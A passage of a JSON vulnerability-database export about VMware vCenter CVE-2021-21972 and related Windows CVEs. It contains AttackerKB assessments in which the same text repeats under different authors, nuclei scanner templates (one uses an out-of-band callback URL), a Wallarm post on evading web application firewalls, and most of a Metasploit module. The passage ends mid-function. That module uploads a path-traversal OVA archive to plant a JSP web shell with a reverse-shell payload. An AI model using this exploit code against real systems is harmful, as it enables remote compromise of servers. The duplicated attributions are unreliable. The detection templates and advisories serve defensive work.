analysis](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis>). Thank you.\n\n**architect00** at September 22, 2021 1:31pm UTC reported:\n\nThis assessment has moved to the [Rapid7 analysis](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis>). Thank you.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-23T00:00:00", "type": "attackerkb", "title": "CVE-2021-22005", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-22005"], "modified": "2021-09-29T00:00:00", "id": "AKB:A2C0FB81-B0C3-4850-9393-E52427779FBF", "href": "https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:37:33", "description": "HTTP Protocol Stack Remote Code Execution Vulnerability\n\n \n**Recent assessments:** \n \n**architect00** at May 12, 2021 8:18am UTC reported:\n\nThe vulnerability only affects newer versions of Windows 10 / Server. Version 20H2 and 2004 of Windows 10 and Windows Server Core installations are affected according to the Microsoft Advisory.\n\nThe semi-annual channel versions are not that common in bigger organisations. This affected my rating on _attacker value_. I would argue , that most of them use the LTSC of older Windows versions. The _attacker value_ is not very low, because the vulnerability has the potential of being used for lateral movement in a computer worm. So this might still be relevant to use in smaller organisations.\n\nMicrosoft rates this vulnerability \u201cExploitation more likely\u201d. This means that exploitation would be reliable and Microsoft ist aware of exploits in past for similar vulnerabilities. This affected my _Exploitability_ scoring towards _Easy_ on this vulnerability.\n\nSources:\n\n<https://twitter.com/GossiTheDog/status/1392211087601410054> \n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31166>\n\n**jheysel-r7** at May 17, 2021 7:38pm UTC reported:\n\nThe vulnerability only affects newer versions of Windows 10 / Server. Version 20H2 and 2004 of Windows 10 and Windows Server Core installations are affected according to the Microsoft Advisory.\n\nThe semi-annual channel versions are not that common in bigger organisations. This affected my rating on _attacker value_. I would argue , that most of them use the LTSC of older Windows versions. The _attacker value_ is not very low, because the vulnerability has the potential of being used for lateral movement in a computer worm. So this might still be relevant to use in smaller organisations.\n\nMicrosoft rates this vulnerability \u201cExploitation more likely\u201d. This means that exploitation would be reliable and Microsoft ist aware of exploits in past for similar vulnerabilities. This affected my _Exploitability_ scoring towards _Easy_ on this vulnerability.\n\nSources:\n\n<https://twitter.com/GossiTheDog/status/1392211087601410054> \n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31166>\n\n**nu11secur1ty** at July 10, 2021 9:26pm UTC reported:\n\nThe vulnerability only affects newer versions of Windows 10 / Server. Version 20H2 and 2004 of Windows 10 and Windows Server Core installations are affected according to the Microsoft Advisory.\n\nThe semi-annual channel versions are not that common in bigger organisations. This affected my rating on _attacker value_. I would argue , that most of them use the LTSC of older Windows versions. The _attacker value_ is not very low, because the vulnerability has the potential of being used for lateral movement in a computer worm. So this might still be relevant to use in smaller organisations.\n\nMicrosoft rates this vulnerability \u201cExploitation more likely\u201d. This means that exploitation would be reliable and Microsoft ist aware of exploits in past for similar vulnerabilities. This affected my _Exploitability_ scoring towards _Easy_ on this vulnerability.\n\nSources:\n\n<https://twitter.com/GossiTheDog/status/1392211087601410054> \n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31166>\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-05-11T00:00:00", "type": "attackerkb", "title": "CVE-2021-31166", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2021-31166"], "modified": "2023-10-07T00:00:00", "id": "AKB:72CB57AD-D32C-43D3-86B8-F8B617707C5B", "href": "https://attackerkb.com/topics/pZcouFxeCW/cve-2021-31166", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T11:33:48", "description": "An information disclosure vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests, aka \u2018Windows SMBv3 Client/Server Information Disclosure Vulnerability\u2019.\n\n \n**Recent assessments:** \n \n**busterb** at June 09, 2020 11:49pm UTC reported:\n\nEdit: After writing this **@adfoster-r7** pointed out that Zecops has a writeup on exactly how to chain this with SMBGhost. How apropos! <https://blog.zecops.com/vulnerabilities/smbleedingghost-writeup-chaining-smbleed-cve-2020-1206-with-smbghost/>\n\nNote that if you were already patched against CVE-2020-0796, the current PoCs aren\u2019t going to be impactful to you, so the urgency is lower than if you\u2019re a couple of months out of date. If you\u2019re patching already, no need to panic.\n\nWhenever we see SMB memory corruption leaks, the cry is always \u2018oh, if only we had an information leak, we could make this so much more reliable\u2019. Well, assuming someone figures out the details, this could be the information leak folks are looking for to make SMBGhost and other vulnerabilities more reliable to exploit. Not a big deal by itself, but I imagine folks are already trying to figure out how to use this to an advantage. It might not take long given the existence of public SMBGhost PoCs already.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-06-09T00:00:00", "type": "attackerkb", "title": "CVE-2020-1206 Windows SMBv3 Client/Server Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-1206"], "modified": "2023-10-06T00:00:00", "id": "AKB:ED05CA72-27C8-4C22-BFF9-2AE3451C549C", "href": "https://attackerkb.com/topics/svIblFzC4r/cve-2020-1206-windows-smbv3-client-server-information-disclosure-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:15:40", "description": "An elevation of privilege vulnerability exists in OpenSSH for Windows when it does not properly restrict access to configuration settings, aka \u2018OpenSSH for Windows Elevation of Privilege Vulnerability\u2019.\n\n \n**Recent assessments:** \n \n**busterb** at June 09, 2020 7:11pm UTC reported:\n\nThis vuln. appears to allow any authenticated user on a Windows system to modify the configuration settings for OpenSSH, which would allow for configuring it in such a way that could allow for a privilege escalation for an inbound user via SSH. OTOH, if you are already authenticated, you could just login yourself and perform an LPE much the same way as SMBGhost was used for LPE CVE-2020-0796\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 3\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-06-09T00:00:00", "type": "attackerkb", "title": "CVE-2020-1292 OpenSSH for Windows Elevation of Privilege Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-1292"], "modified": "2020-07-24T00:00:00", "id": "AKB:27DB2819-5039-4831-815A-798764488B88", "href": "https://attackerkb.com/topics/lHvv23pCqC/cve-2020-1292-openssh-for-windows-elevation-of-privilege-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nuclei": [{"lastseen": "2023-12-02T21:51:39", "description": "VMware vSphere (HTML5) is susceptible to server-side request forgery due to improper validation of URLs in a vCenter Server plugin. An attacker with network access to port 443 can exploit this issue by sending a POST request to the plugin. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l, and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2020-04-04T16:21:34", "type": "nuclei", "title": "VMware vSphere - Server-Side Request Forgery", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21973"], "modified": "2020-04-04T16:21:34", "id": "NUCLEI:CVE-2021-21973", "href": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2021/CVE-2021-21973.yaml", "sourceData": "id: CVE-2021-21973\n\ninfo:\n name: VMware vSphere - Server-Side Request Forgery\n author: pdteam\n severity: medium\n description: VMware vSphere (HTML5) is susceptible to server-side request forgery due to improper validation of URLs in a vCenter Server plugin. An attacker with network access to port 443 can exploit this issue by sending a POST request to the plugin. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l, and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).\n remediation: |\n Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability.\n reference:\n - https://twitter.com/osama_hroot/status/1365586206982082560\n - https://twitter.com/bytehx343/status/1486582542807420928\n - https://www.vmware.com/security/advisories/VMSA-2021-0002.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21973\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-21973\n cwe-id: CWE-918\n epss-score: 0.31709\n epss-percentile: 0.96552\n cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: vmware\n product: cloud_foundation\n tags: cve,cve2021,vmware,ssrf,vcenter,oast,kev\n\nhttp:\n - raw:\n - |\n GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1\n Host: {{Hostname}}\n Vcip: {{interactsh-url}}\n Vcpassword: {{rand_base(6)}}\n Vcusername: {{rand_base(6)}}\n Reqresource: {{rand_base(6)}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"The server sent HTTP status code 200\"\n\n - type: status\n status:\n - 500\n# digest: 4b0a0048304602210096f20306f4608c46b1d89aba48a8ae6a82c0172205cdac5ef8f07ae0ac02b797022100d5b1e30ec9c93c3c6edf05813a4941f92072643960e3acd763bbd0d49062a94a:922c64590222798bb761d5b6d8e72950", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-02T21:51:38", "description": "VMware vCenter vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-04T16:21:34", "type": "nuclei", "title": "VMware vSphere Client (HTML5) - Remote Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2020-04-04T16:21:34", "id": "NUCLEI:CVE-2021-21972", "href": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2021/CVE-2021-21972.yaml", "sourceData": "id: CVE-2021-21972\n\ninfo:\n name: VMware vSphere Client (HTML5) - Remote Code Execution\n author: dwisiswant0\n severity: critical\n description: VMware vCenter vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).\n remediation: |\n Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability.\n reference:\n - https://swarm.ptsecurity.com/unauth-rce-vmware/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21972\n - https://www.vmware.com/security/advisories/VMSA-2021-0002.html\n - http://packetstormsecurity.com/files/161590/VMware-vCenter-Server-7.0-Arbitrary-File-Upload.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-21972\n cwe-id: CWE-22\n epss-score: 0.97402\n epss-percentile: 0.99908\n cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: vmware\n product: cloud_foundation\n tags: cve2021,vmware,rce,vcenter,kev,packetstorm,cve\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ui/vropspluginui/rest/services/getstatus\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"VSPHERE-UI-JSESSIONID\"\n condition: and\n\n - type: regex\n part: body\n regex:\n - \"(Install|Config) Final Progress\"\n\n - type: status\n status:\n - 200\n\n# digest: 4b0a00483046022100f873f951f79d6f7ed1a6e9adbcdfb28c55364751f3155f2fc96c1e79c5c8504d022100a85a95445aec69b73b0044820a73b53955d02929181b2d4f8c88334d69d58fde:922c64590222798bb761d5b6d8e72950", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "wallarmlab": [{"lastseen": "2021-08-19T16:35:42", "description": "The recent critical security issue in VMware vCenter was discovered this January and fixed on February 23rd <https://www.vmware.com/security/advisories/VMSA-2021-0002.html>. The exploit looks like a simple JSP shell upload, but for some reason, it&#x27;s a blind spot for Web Application Firewalls (WAFs). Let&#x27;s understand why. \n\nThe CVE-2021-21972 affects vCenter versions 6.5, 6.7, and 7.0. The exploit for Metasploit released <https://vulners.com/packetstorm/PACKETSTORM:161695> today.\n\nThe exploit description is pretty straight forward &quot;This module exploits an unauthenticated OVA file upload and path traversal in VMware vCenter Server to write a JSP payload to a web-accessible directory. &quot;. It should be something like a classic web shell file upload issue from the 90th. \n\nThis issue&#x27;s root cause is behind an unauthenticated OVA upload endpoint on the &quot;/ui/vropspluginui/rest/services/uploadova&quot; URL. But the neat thing is that the payload itself is delivered inside the TAR file package and uses path traversal trick inside. \n\nThis part of the exploit source code explains it: \n \n \n # HACK: Spray JSP in the OVA and pray we get a shell... \n Rex::Tar::Writer.new(ova_file) do |tar| \n jsp_paths.each do |path| \n # /tmp/unicorn_ova_dir/../../<path> \n tar.add_file(\"../..#{path}\", 0o644) { |jsp| jsp.write(payload.encoded) } \n end \n end \n\nAs we can see, a JSP file with a web shell inside added to the TAR achieve with the path traversal attack vector in a file path. As a result, VMware vCenter software extracts the JSP web shell from the TAR file to the webserver&#x27;s &quot;resources&quot; or &quot;statsreport&quot; folder. Once uploaded, the web shell is available by a direct HTTP request.\n\nSo, what happens with WAFs in this case? An answer is simple, and it&#x27;s encoding. Since malicious payloads like web shell JSP body and path traversal attack in a filename encoded by TAR file format, WAF can&#x27;t see it. For web application firewalls, it&#x27;s just binary data that goes to the webserver and nothing more. To catch such cases, WAFs should be able to decode TAR files on a flight, unpack them, check for malicious payloads, and only after that sends to a protected webserver or API gateway. \n\nUnfortunately, not all the WAFs support TAR encodings, as well as JSON, GZIP, XML, and a bunch of more usual web data formats. \n\nTo mitigate this issue, we recommend applying a virtual patch for the &quot;/ui/vropspluginui/rest/services/uploadova&quot; endpoint.\n\nStay secure!\n\nThe post [Why WAFs can&#x27;t catch VMware CVE-2021-21972 Remote Code Execution Exploit?](<https://lab.wallarm.com/why-wafs-cant-catch-vmware-cve-2021-21972-remote-code-execution-exploit/>) appeared first on [Wallarm](<https://lab.wallarm.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-08T20:22:27", "type": "wallarmlab", "title": "Why WAFs can\u2019t catch VMware CVE-2021-21972 Remote Code Execution Exploit?", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-08T20:22:27", "id": "WALLARMLAB:7A0E7E3752712070F3E75CEF26AC2CC0", "href": "https://lab.wallarm.com/why-wafs-cant-catch-vmware-cve-2021-21972-remote-code-execution-exploit/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2023-12-02T15:55:16", "description": "This Metasploit module exploits an unauthenticated OVA file upload and path traversal in VMware vCenter Server to write a JSP payload to a web-accessible directory. Fixed versions are 6.5 Update 3n, 6.7 Update 3l, and 7.0 Update 1c. Note that later vulnerable versions of the Linux appliance aren't exploitable via the webshell technique. Furthermore, writing an SSH public key to /home/vsphere-ui/.ssh/authorized_keys works, but the user's non-existent password expires 90 days after install, rendering the technique nearly useless against production environments. You'll have the best luck targeting older versions of the Linux appliance. The Windows target should work ubiquitously.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-08T00:00:00", "type": "zdt", "title": "VMware vCenter Server File Upload / Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-08T00:00:00", "id": "1337DAY-ID-35912", "href": "https://0day.today/exploit/description/35912", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n # \"Shotgun\" approach to writing JSP\n Rank = ManualRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vCenter Server Unauthenticated OVA File Upload RCE',\n 'Description' => %q{\n This module exploits an unauthenticated OVA file upload and path\n traversal in VMware vCenter Server to write a JSP payload to a\n web-accessible directory.\n\n Fixed versions are 6.5 Update 3n, 6.7 Update 3l, and 7.0 Update 1c.\n Note that later vulnerable versions of the Linux appliance aren't\n exploitable via the webshell technique. Furthermore, writing an SSH\n public key to /home/vsphere-ui/.ssh/authorized_keys works, but the\n user's non-existent password expires 90 days after install, rendering\n the technique nearly useless against production environments.\n\n You'll have the best luck targeting older versions of the Linux\n appliance. The Windows target should work ubiquitously.\n },\n 'Author' => [\n 'Mikhail Klyuchnikov', # Discovery\n 'wvu', # Analysis and exploit\n 'mr_me', # Co-conspirator\n 'Viss' # Co-conspirator\n ],\n 'References' => [\n ['CVE', '2021-21972'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0002.html'],\n ['URL', 'https://swarm.ptsecurity.com/unauth-rce-vmware/'],\n ['URL', 'https://twitter.com/jas502n/status/1364810720261496843'],\n ['URL', 'https://twitter.com/_0xf4n9x_/status/1364905040876503045'],\n ['URL', 'https://twitter.com/HackingLZ/status/1364636303606886403'],\n ['URL', 'https://kb.vmware.com/s/article/2143838'],\n ['URL', 'https://nmap.org/nsedoc/scripts/vmware-version.html']\n ],\n 'DisclosureDate' => '2021-02-23', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux', 'win'],\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false, # true on Windows\n 'Targets' => [\n [\n # TODO: /home/vsphere-ui/.ssh/authorized_keys\n 'VMware vCenter Server <= 6.7 Update 1b (Linux)',\n {\n 'Platform' => 'linux'\n }\n ],\n [\n 'VMware vCenter Server <= 6.7 Update 3j (Windows)',\n {\n 'Platform' => 'win'\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SSL' => true,\n 'PAYLOAD' => 'java/jsp_shell_reverse_tcp',\n 'CheckModule' => 'auxiliary/scanner/vmware/esx_fingerprint'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],\n 'RelatedModules' => ['auxiliary/scanner/vmware/esx_fingerprint']\n }\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n\n register_advanced_options([\n # /usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/<index>\n OptInt.new('SprayAndPrayMin', [true, 'Deployer index start', 40]), # mr_me\n OptInt.new('SprayAndPrayMax', [true, 'Deployer index stop', 41]) # wvu\n ])\n end\n\n def spray_and_pray_min\n datastore['SprayAndPrayMin']\n end\n\n def spray_and_pray_max\n datastore['SprayAndPrayMax']\n end\n\n def spray_and_pray_range\n (spray_and_pray_min..spray_and_pray_max).to_a\n end\n\n def check\n # Run auxiliary/scanner/vmware/esx_fingerprint\n super\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/ui/vropspluginui/rest/services/getstatus')\n )\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n case res.code\n when 200\n # {\"States\":\"[]\",\"Install Progress\":\"UNKNOWN\",\"Config Progress\":\"UNKNOWN\",\"Config Final Progress\":\"UNKNOWN\",\"Install Final Progress\":\"UNKNOWN\"}\n expected_keys = [\n 'States',\n 'Install Progress',\n 'Install Final Progress',\n 'Config Progress',\n 'Config Final Progress'\n ]\n\n if (expected_keys & res.get_json_document.keys) == expected_keys\n return CheckCode::Vulnerable('Unauthenticated endpoint access granted.')\n end\n\n CheckCode::Detected('Target did not respond with expected keys.')\n when 401\n CheckCode::Safe('Unauthenticated endpoint access denied.')\n else\n CheckCode::Detected(\"Target responded with code #{res.code}.\")\n end\n end\n\n def exploit\n upload_ova\n pop_thy_shell # ;)\n end\n\n def upload_ova\n print_status(\"Uploading OVA file: #{ova_filename}\")\n\n multipart_form = Rex::MIME::Message.new\n multipart_form.add_part(\n generate_ova,\n 'application/x-tar', # OVA is tar\n 'binary',\n %(form-data; name=\"uploadFile\"; filename=\"#{ova_filename}\")\n )\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/ui/vropspluginui/rest/services/uploadova'),\n 'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\",\n 'data' => multipart_form.to_s\n )\n\n unless res && res.code == 200 && res.body == 'SUCCESS'\n fail_with(Failure::NotVulnerable, 'Failed to upload OVA file')\n end\n\n register_files_for_cleanup(*jsp_paths)\n\n print_good('Successfully uploaded OVA file')\n end\n\n def pop_thy_shell\n jsp_uri =\n case target['Platform']\n when 'linux'\n normalize_uri(target_uri.path, \"/ui/resources/#{jsp_filename}\")\n when 'win'\n normalize_uri(target_uri.path, \"/statsreport/#{jsp_filename}\")\n end\n\n print_status(\"Requesting JSP payload: #{full_uri(jsp_uri)}\")\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => jsp_uri\n )\n\n unless res && res.code == 200\n fail_with(Failure::PayloadFailed, 'Failed to request JSP payload')\n 